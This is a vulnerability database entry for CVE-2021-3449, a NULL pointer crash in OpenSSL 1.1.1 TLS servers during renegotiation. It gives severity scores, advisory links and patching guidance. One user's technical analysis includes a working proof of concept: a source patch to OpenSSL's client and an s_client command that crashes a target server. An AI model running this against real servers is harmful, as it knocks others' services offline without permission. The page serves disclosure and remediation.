Attacker Value
Moderate
(1 user assessed)
Exploitability
High
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
4

OpenSSL TLS Server Crash (NULL pointer dereference) — CVE-2021-3449

Disclosure Date: March 25, 2021
CVE-2021-3449 CVSS v3 Base Score: 5.9
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).

Add Assessment

4
Ratings
  • Attacker Value
    Medium
  • Exploitability
    High
Common in enterpriseUnauthenticatedVulnerable in default configurationNo useful access
Technical Analysis

The exploitation of this vulnerability would be most easily accomplished using a patched version of OpenSSL to modify the extensions sent within the ClientHello of the renegotiation. Successful exploitation of this vulnerability is likely limited to a Denial of Service condition. Allocating and setting the contents of the NULL page is extremely unlikely from the vantage point of a remote attacker.

The following patch can be applied to OpenSSL 1.1.1k (commit fd78df59) to generate a build capable of reproducing the vulnerability.

index ce8a75794c..3e3f774dab 100644
--- a/ssl/statem/extensions_clnt.c
+++ b/ssl/statem/extensions_clnt.c
@@ -272,7 +272,7 @@ EXT_RETURN tls_construct_ctos_sig_algs(SSL *s, WPACKET *pkt,
         return EXT_RETURN_NOT_SENT;
 
     salglen = tls12_get_psigalgs(s, 1, &salg);
-    if (!WPACKET_put_bytes_u16(pkt, TLSEXT_TYPE_signature_algorithms)
+    if (!WPACKET_put_bytes_u16(pkt, (s->renegotiate ? TLSEXT_TYPE_signature_algorithms_cert : TLSEXT_TYPE_signature_algorithms))
                /* Sub-packet for sig-algs extension */
             || !WPACKET_start_sub_packet_u16(pkt)
                /* Sub-packet for the actual list */

What this change is doing is swapping the signature_algorithms extension for signature_algorithms_cert when the SSL context is renegotiating.

With a patched version of OpenSSL built, run the openssl client, specifying TLS version 1.2 and renegotiate.

echo R | apps/openssl s_client -connect target:443 -msg -tls1_2
Log in to Add Reply
CVSS V3 Severity and Metrics
Base Score:
5.9 Medium
Impact Score:
3.6
Exploitability Score:
2.2
Vector:
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
High
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
None
Integrity (I):
None
Availability (A):
High

General Information

Offensive Application
dos
Utility Class
other
Ports
Unknown
OS
Unknown
Vulnerable Versions
OpenSSL Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j)
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Peter Kästle (Nokia)
Samuel Sapalski (Nokia)

Vendors

Products

Weaknesses

References

Canonical
CVE-2021-3449 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449)
Advisory
https://www.openssl.org/news/secadv/20210325.txt
https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148
20210325 Multiple Vulnerabilities in OpenSSL Affecting Cisco Products: March 2021 (https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd)
DSA-4875 (https://www.debian.org/security/2021/dsa-4875)
https://security.netapp.com/advisory/ntap-20210326-0006/
[oss-security] 20210327 OpenSSL 1.1.1 CVE-2021-3450 CA certificate check bypass with X509_V_FLAG_X509_STRICT, CVE-2021-3449 NULL pointer deref in signature_algorithms processing (http://www.openwall.com/lists/oss-security/2021/03/27/1)
[oss-security] 20210327 Re: OpenSSL 1.1.1 CVE-2021-3450 CA certificate check bypass with X509_V_FLAG_X509_STRICT, CVE-2021-3449 NULL pointer deref in signature_algorithms processing (http://www.openwall.com/lists/oss-security/2021/03/27/2)
[oss-security] 20210328 Re: OpenSSL 1.1.1 CVE-2021-3450 CA certificate check bypass with X509_V_FLAG_X509_STRICT, CVE-2021-3449 NULL pointer deref in signature_algorithms processing (http://www.openwall.com/lists/oss-security/2021/03/28/3)
[oss-security] 20210328 Re: OpenSSL 1.1.1 CVE-2021-3450 CA certificate check bypass with X509_V_FLAG_X509_STRICT, CVE-2021-3449 NULL pointer deref in signature_algorithms processing (http://www.openwall.com/lists/oss-security/2021/03/28/4)
GLSA-202103-03 (https://security.gentoo.org/glsa/202103-03)
https://www.tenable.com/security/tns-2021-06
https://www.tenable.com/security/tns-2021-05
FEDORA-2021-cbf14ab8f9 (https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/)
https://kc.mcafee.com/corporate/index?page=content&id=SB10356
https://www.tenable.com/security/tns-2021-09
https://security.netapp.com/advisory/ntap-20210513-0002/
https://www.tenable.com/security/tns-2021-10
https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013
[debian-lts-announce] 20210831 [SECURITY] [DLA 2751-1] postgresql-9.6 security update (https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html)
https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf
https://security.netapp.com/advisory/ntap-20240621-0006/
Miscellaneous
https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc
https://www.oracle.com/security-alerts/cpuApr2021.html
https://www.oracle.com//security-alerts/cpujul2021.html
https://www.oracle.com/security-alerts/cpuoct2021.html
https://www.oracle.com/security-alerts/cpuapr2022.html
https://www.oracle.com/security-alerts/cpujul2022.html

Additional Info

Authenticated
Never
Exploitable
Unknown
Reliability
Unknown
Stability
Unknown
Available Mitigations
Unknown
Shelf Life
Unknown
Userbase/Installbase
Medium
Patch Effectiveness
Unknown
Technical Analysis

Description

A denial-of-service condition exists in the default renegotiation configuration of TLSv1.2, triggered by malicious ClientHello requests.

Affected versions include:

  • All OpenSSL 1.1.1 versions are affected by this issue

Guidance

Organizations that develop products or services that utilize OpenSSL should integrate the fixes as soon as possible.

Organizations that use products that have embedded OpenSSL should monitor their vendor patch releases to see if they are affected and patch according to your normal priority patch window cycle unless you are running very sensitive applications in need of a very high level of CA assurance (CVE-2021-3450) or have internet-facing systems that could be targeted with hard-to-detect application-level denial-of-service attacks (CVE-2021-3449)